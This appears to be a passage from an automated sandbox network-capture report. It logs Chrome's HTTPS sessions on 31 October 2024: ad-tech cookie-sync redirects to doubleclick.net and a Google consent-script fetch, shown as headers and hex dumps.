                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                      reporting-endpoints: default="/_/ContributorLoggingHttp/web-reports?context=eJzjUtDikmII0JBicEqfwRoCxO5aF1n9gZjh6xVWDiAW4ubYNqV_J5vAg20rSpRckvIL45Pz80pS80p0E1OKdUHsosyk0pL8IhR2ahlIRU5-enpmXnq8kYGRiaGBsYGegXF8gQEAC_Modw"
                                                                                                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      38192.168.2.449854107.21.226.444437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC875OUTGET /d/sync/cookie/generic?https://cm.g.doubleclick.net/pixel?google_nid=adelphic_mobile&google_gid=CAESEFdi1-RiPfWOI2CLRzbOGh8&google_cver=1&google_push=AXcoOmRs--NX_amzQoFfaVNg5QoiiG0PbKRUiH2xlJkIPOhaYBZjwU9VO-TZql-FDrFlnoZ8M75CK8ZQ9kFGCZP5OX1boLe0fbMXAQ&google_hm=${ADELPHIC_CUID_B64} HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: sync.ipredictive.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC643INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:34 GMT
                                                                                                                                                                                                                                                                                                                      Location: https://cm.g.doubleclick.net/pixel?google_nid=adelphic_mobile&google_gid=CAESEFdi1-RiPfWOI2CLRzbOGh8&google_cver=1&google_push=AXcoOmRs--NX_amzQoFfaVNg5QoiiG0PbKRUiH2xlJkIPOhaYBZjwU9VO-TZql-FDrFlnoZ8M75CK8ZQ9kFGCZP5OX1boLe0fbMXAQ&google_hm=kkabdqbbSw6jVFe-wq1F4Q==
                                                                                                                                                                                                                                                                                                                      Set-Cookie: cu=92469b76-a6db-4b0e-a354-57bec2ad45e1|1730398774191; Path=/; Domain=ipredictive.com; Expires=Fri, 31 Oct 2025 18:19:34 GMT; Max-Age=31536000; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                      X-CI-RTID: 969213ab-f4ca-438a-8f73-04fadc857cc5
                                                                                                                                                                                                                                                                                                                      Content-Length: 303
                                                                                                                                                                                                                                                                                                                      Connection: Close
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC303INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6d 2e 67 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 70 69 78 65 6c 3f 67 6f 6f 67 6c 65 5f 6e 69 64 3d 61 64 65 6c 70 68 69 63 5f 6d 6f 62 69 6c 65 26 61 6d 70 3b 67 6f 6f 67 6c 65 5f 67 69 64 3d 43 41 45 53 45 46 64 69 31 2d 52 69 50 66 57 4f 49 32 43 4c 52 7a 62 4f 47 68 38 26 61 6d 70 3b 67 6f 6f 67 6c 65 5f 63 76 65 72 3d 31 26 61 6d 70 3b 67 6f 6f 67 6c 65 5f 70 75 73 68 3d 41 58 63 6f 4f 6d 52 73 2d 2d 4e 58 5f 61 6d 7a 51 6f 46 66 61 56 4e 67 35 51 6f 69 69 47 30 50 62 4b 52 55 69 48 32 78 6c 4a 6b 49 50 4f 68 61 59 42 5a 6a 77 55 39 56 4f 2d 54 5a 71 6c 2d 46 44 72 46 6c 6e 6f 5a 38 4d 37 35 43 4b 38 5a 51 39 6b 46 47 43 5a 50 35 4f 58 31 62 6f 4c 65 30 66 62 4d 58 41 51 26 61 6d 70 3b
                                                                                                                                                                                                                                                                                                                      Data Ascii: <a href="https://cm.g.doubleclick.net/pixel?google_nid=adelphic_mobile&amp;google_gid=CAESEFdi1-RiPfWOI2CLRzbOGh8&amp;google_cver=1&amp;google_push=AXcoOmRs--NX_amzQoFfaVNg5QoiiG0PbKRUiH2xlJkIPOhaYBZjwU9VO-TZql-FDrFlnoZ8M75CK8ZQ9kFGCZP5OX1boLe0fbMXAQ&amp;


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      39192.168.2.449858174.137.133.494437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC773OUTGET /sync?exchange=11&google_gid=CAESEEsdtE4SKtYWVNPeVuWOY-c&google_cver=1&google_push=AXcoOmSt6_labGwG7eZ_989UtFK9wsaMAzKlKq1YttCVRXJ4tJ7NNPhWGVLSYuXx1V87z2xqKNZZQWX1Dv1IKIrsa3-8sxKvqRw_lA HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: dsp.adkernel.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC537INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:34 GMT
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Set-Cookie: ADK_EX_11=1; Max-Age=1209600; Domain=.adkernel.com; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      Set-Cookie: ADKUID=A8836978867793438466; Max-Age=2592000; Domain=.adkernel.com; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      Location: https://cm.g.doubleclick.net/pixel?google_nid=adkernel&google_hm=QTg4MzY5Nzg4Njc3OTM0Mzg0NjY&google_push=AXcoOmSt6_labGwG7eZ_989UtFK9wsaMAzKlKq1YttCVRXJ4tJ7NNPhWGVLSYuXx1V87z2xqKNZZQWX1Dv1IKIrsa3-8sxKvqRw_lA


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      40192.168.2.44986020.157.217.1184437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC771OUTGET /api/adx/cm/pixel?google_gid=CAESEPW3MUN8tvNLNoJsiPIpkO8&google_cver=1&google_push=AXcoOmRTXTUn1Pr6awWAnQRPgchY6LBTD7UWgfftnoBHloxfG5GmoNInKY9_iM4LiUT3GONf9BhydenY40DkAIQfixnY9Gu6A9hJZS1O HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: www.temu.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC768INHTTP/1.1 302
                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:34 GMT
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Location: https://cm.g.doubleclick.net/pixel?google_nid=whaleco_services_llc&google_push=AXcoOmRTXTUn1Pr6awWAnQRPgchY6LBTD7UWgfftnoBHloxfG5GmoNInKY9_iM4LiUT3GONf9BhydenY40DkAIQfixnY9Gu6A9hJZS1O
                                                                                                                                                                                                                                                                                                                      Content-Language: en-US
                                                                                                                                                                                                                                                                                                                      x-gateway-request-id: 1730398774400-4f2eadd2afcb30b5c2e544288f26a4d3
                                                                                                                                                                                                                                                                                                                      strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                      content-security-policy-report-only: default-src 'none';script-src 'report-sample';report-uri /api/sec-csp/110000007/sec-gif
                                                                                                                                                                                                                                                                                                                      yak-timeinfo: 1730398774400|3
                                                                                                                                                                                                                                                                                                                      Set-Cookie: api_uid=Cm0sO2cjyjYzcABdrDD8Ag==; expires=Fri, 31-Oct-25 18:19:34 GMT; domain=.temu.com; path=/; secure
                                                                                                                                                                                                                                                                                                                      cip: 173.254.250.77
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=604800


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      41192.168.2.449853142.250.185.1424437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC1083OUTGET /f/AGSKWxXE0rdt5cwklf9PRBqqi8rFncdilTmLVYbRCmgcYEIr_h6aXnlDVbYl8-Mw69k26WrMfK2ANMfR9tO7b_s5NhLr9ZNkM_vAqZxxWuutweCz4t4EvQ7RPeu7lVUr28c-H-5-bioZAg==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzcyLDU3NDAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNl0sbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsMV0sImh0dHBzOi8vdHJrc3lsbi5uZXQvRXJyb3IiLG51bGwsW1s4LCJZc2dPT2N0dWtySSJdLFs5LCJlbi1VUyJdLFsxOSwiMiJdLFsxNywiWzBdIl0sWzE4LCJbW1sxXV1dIl1dXQ HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC1952INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:34 GMT
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-wCOSEmvIvKGuG2nR7bqr1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                      reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjKtHikmLw1pBiUAjbyXTi1m2mC0As8fUlkxYQO6XPYA0B4tab51inA3HSv_OsJUDsrnWR1R-IDRUusToDsWPRJVZPIFbtucRqDsT3111ifQ7ERRJXWFuA-HbTFdbHQMzw9QorBxAL8XBsm9K_k03gxbXlzYxKGkn5hfHJ-XklRZlJpSX5RWnJaanFqUVlqUXxRgZGJoYGxgZ6BgbxBQYAbwFGFQ"
                                                                                                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC1952INData Raw: 64 39 66 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 2e 72 75 6e 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 76 61 72 20 74 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 6e 6e 28 63 29 2c 66 2c 67 2c 68 3d
                                                                                                                                                                                                                                                                                                                      Data Ascii: d9fif (typeof __googlefc.fcKernelManager.run === 'function') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs||{};(function(_){var window=this;try{var tn=function(a,b,c,d){var e=nn(c),f,g,h=
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC1542INData Raw: 2e 7a 28 63 2c 5f 2e 61 67 2c 32 29 26 26 28 63 3d 5f 2e 45 28 63 2c 5f 2e 61 67 2c 32 29 2c 5f 2e 4e 28 64 2c 33 2c 63 29 29 3b 5f 2e 4e 28 62 2c 32 2c 64 29 3b 61 2e 52 28 32 2c 5f 2e 4a 28 62 29 29 7d 7d 7d 3b 76 61 72 20 41 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 41 6e 2c 5f 2e 49 29 3b 76 61 72 20 42 6e 3d 5b 32 2c 33 5d 3b 76 61 72 20 7a 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 7a 6e 2c 5f 2e 49 29 3b 76 61 72 20 43 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 43 6e 2c 5f 2e 49 29 3b 76 61 72 20 44 6e 3d 5f 2e 75 28 43 6e 29 3b 76 61 72 20 45 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                                                                                                                                                                                                                                                                      Data Ascii: .z(c,_.ag,2)&&(c=_.E(c,_.ag,2),_.N(d,3,c));_.N(b,2,d);a.R(2,_.J(b))}}};var An=function(a){this.l=_.t(a)};_.v(An,_.I);var Bn=[2,3];var zn=function(a){this.l=_.t(a)};_.v(zn,_.I);var Cn=function(a){this.l=_.t(a)};_.v(Cn,_.I);var Dn=_.u(Cn);var En=function(){
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      42192.168.2.449864174.137.133.494437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC771OUTGET /sync?exchange=11&google_gid=CAESEDdTD-hSLjZJhPlP3FuVp9M&google_cver=1&google_push=AXcoOmSt1m7rF-4iFBqUxfNrh9kLkm2l2-27NM6ylpVM1BbGfx988rXg5S47kzFlUujGYJTCJlkITmT_GbciUFrM5Au3IbUbXt8y HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: dsp.adkernel.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC535INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:34 GMT
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Set-Cookie: ADK_EX_11=1; Max-Age=1209600; Domain=.adkernel.com; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      Set-Cookie: ADKUID=A1746760580361003486; Max-Age=2592000; Domain=.adkernel.com; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      Location: https://cm.g.doubleclick.net/pixel?google_nid=adkernel&google_hm=QTE3NDY3NjA1ODAzNjEwMDM0ODY&google_push=AXcoOmSt1m7rF-4iFBqUxfNrh9kLkm2l2-27NM6ylpVM1BbGfx988rXg5S47kzFlUujGYJTCJlkITmT_GbciUFrM5Au3IbUbXt8y


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      43192.168.2.449859208.93.169.1314437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC784OUTGET /bh/rtset?pid=559960&gp=1&google_gid=CAESEC6PH-lvJoYH9V_-6nwhMus&google_cver=1&google_push=AXcoOmQHW3Senmpk8tpcaDaCAkasoYHxB1QL3vzrRn4MuUN_wlYAkuh8f5ngrgzRfD_4zBEpSvzZMxzLE6FJ02A6qXPBh-8n3s0ad4A9 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: bh.contextweb.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC1466INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      p3p: policyref="/bh/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
                                                                                                                                                                                                                                                                                                                      accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Bitness,Sec-CH-UA-Mobile,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                      cw-server: bh-deployment-fc986c88d-2x9cw
                                                                                                                                                                                                                                                                                                                      cache-control: private, max-age=0, no-cache, no-store
                                                                                                                                                                                                                                                                                                                      expires: -1
                                                                                                                                                                                                                                                                                                                      content-language: en-US
                                                                                                                                                                                                                                                                                                                      set-cookie: V=cUA7hh0a77Vk;Version=0;Secure;Path=/;Domain=.contextweb.com;Expires=Sun, 26-Oct-2025 18:19:34 GMT;Max-Age=31104000;SameSite=None
                                                                                                                                                                                                                                                                                                                      set-cookie: VP=part_cUA7hh0a77Vk;Version=0;Path=/;Domain=.contextweb.com;Max-Age=31104000;Secure;Expires=Sun, 26-Oct-2025 18:19:34 GMT;SameSite=None;Partitioned
                                                                                                                                                                                                                                                                                                                      set-cookie: pb_rtb_ev=3-1uid|7Bj.0.CAESEC6PH-lvJoYH9V_-6nwhMus;Version=0;Secure;Path=/;Domain=.contextweb.com;Expires=Fri, 31-Oct-2025 18:19:34 GMT;Max-Age=31536000;SameSite=None
                                                                                                                                                                                                                                                                                                                      set-cookie: pb_rtb_ev_part=3-1uid|7Bj.0.CAESEC6PH-lvJoYH9V_-6nwhMus;Version=0;Path=/;Domain=.contextweb.com;Max-Age=31536000;Secure;Expires=Fri, 31-Oct-2025 18:19:34 GMT;SameSite=None;Partitioned
                                                                                                                                                                                                                                                                                                                      location: https://cm.g.doubleclick.net/pixel?google_nid=pulsepoint_inc_&google_push=AXcoOmQHW3Senmpk8tpcaDaCAkasoYHxB1QL3vzrRn4MuUN_wlYAkuh8f5ngrgzRfD_4zBEpSvzZMxzLE6FJ02A6qXPBh-8n3s0ad4A9&google_hm=Y1VBN2hoMGE3N1Zr
                                                                                                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                      server: Jetty(10.0.14)
                                                                                                                                                                                                                                                                                                                      set-cookie: INGRESSCOOKIE=5940b0e95f9f660c; path=/; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      44192.168.2.449857185.98.54.1534437284C:\Program Files\Google\Chrome\Application\chrome.exe
